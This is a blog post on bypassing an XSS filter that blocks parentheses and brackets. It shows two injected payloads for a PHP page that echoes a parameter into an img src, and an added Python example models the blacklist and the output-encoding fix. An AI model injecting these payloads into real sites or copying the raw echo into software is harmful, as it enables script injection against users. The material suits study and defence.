Saturday, July 6, 2013

XSS parentheses and brackets filter bypassing

Let's assume that injection takes place in img tag src attribute:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="<?php echo $_GET['filename']; ?>" >
...
One approach is to use exceptions, as described here. So the injected code (the filename parameter) should look like this:
fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="
Resulting in:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw 'XSS'" dummyParam="" >
...
But I'd like to show you another way to do XSS without parentheses and brackets, by using location.href and a "data:" URI with base64 encoding. Let's inject the code <script>alert("XSS")</script> (which in base64 is PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=). So the crafted parameter should look like this:
fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="
Resulting in:
<!-- http://example.com/image.php?filename=INJECTION -->
...
<img src="fileThatDoesNotExist" onerror="location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='" dummyParam="" >
...
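To make the defensive point behind both injections concrete, here is an added Python example (not code from the post) that models the vulnerable PHP line, the kind of parentheses/brackets blacklist the post bypasses, and the actual fix: attribute-context output encoding. It also decodes the data: URI so the document it would navigate to can be inspected. The two payload strings are copied from the post; the filter and the rendering helpers are constructed for this example.

```python
import base64
import html
from html.parser import HTMLParser

# Constructed copies of the two injected 'filename' values from the post.
PAYLOAD_THROW = (
    'fileThatDoesNotExist" onerror="javascript:window.onerror=alert;throw \'XSS\'" dummyParam="'
)
PAYLOAD_DATA_URI = (
    'fileThatDoesNotExist" onerror="location.href=\'data:text/html;base64,'
    'PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=\'" dummyParam="'
)

# The kind of blacklist the post is about: it only looks for parentheses and brackets.
BLOCKED_CHARS = "()[]<>"


def naive_filter_accepts(value):
    """Return True if a parentheses/brackets blacklist would let the value through."""
    return not any(ch in value for ch in BLOCKED_CHARS)


def render_vulnerable(filename):
    """Same shape as the PHP in the post: the parameter is echoed raw into the src attribute."""
    return '<img src="%s" >' % filename


def render_hardened(filename):
    """Attribute-context output encoding, the equivalent of htmlspecialchars($v, ENT_QUOTES, 'UTF-8').
    The double quote becomes &quot;, so the value can no longer close the src attribute."""
    return '<img src="%s" >' % html.escape(filename, quote=True)


class _ImgAttrs(HTMLParser):
    """Collects the attributes a browser would see on the <img> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.attrs.update(attrs)


def img_attributes(markup):
    """Parse the rendered tag and return its attributes as {name: value}.
    The parser lowercases names and decodes entities in values."""
    parser = _ImgAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def decode_html_data_uri(uri):
    """Decode a base64 data:text/html URI so the document it would load can be logged or reviewed."""
    header, sep, body = uri.partition(",")
    if not sep or not header.startswith("data:text/html") or not header.endswith(";base64"):
        raise ValueError("not a base64-encoded data:text/html URI")
    return base64.b64decode(body, validate=True).decode("utf-8")


if __name__ == "__main__":
    for name, payload in (("throw", PAYLOAD_THROW), ("data-uri", PAYLOAD_DATA_URI)):
        print(name, "passes blacklist:", naive_filter_accepts(payload))
        print("  vulnerable attrs:", sorted(img_attributes(render_vulnerable(payload))))
        print("  hardened attrs:  ", sorted(img_attributes(render_hardened(payload))))
    print(decode_html_data_uri("data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4="))
```

Both payloads pass the blacklist because neither contains a parenthesis or bracket, and in the vulnerable render each one adds an onerror attribute to the tag. In the hardened render the parsed tag has exactly one attribute, src, whose value is the whole payload as an inert string; that is why the fix for this class of bug is encoding for the output context rather than filtering characters out of the input.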

6 comments:

  1. Any reason why you use location.href, any other DOMs can be used?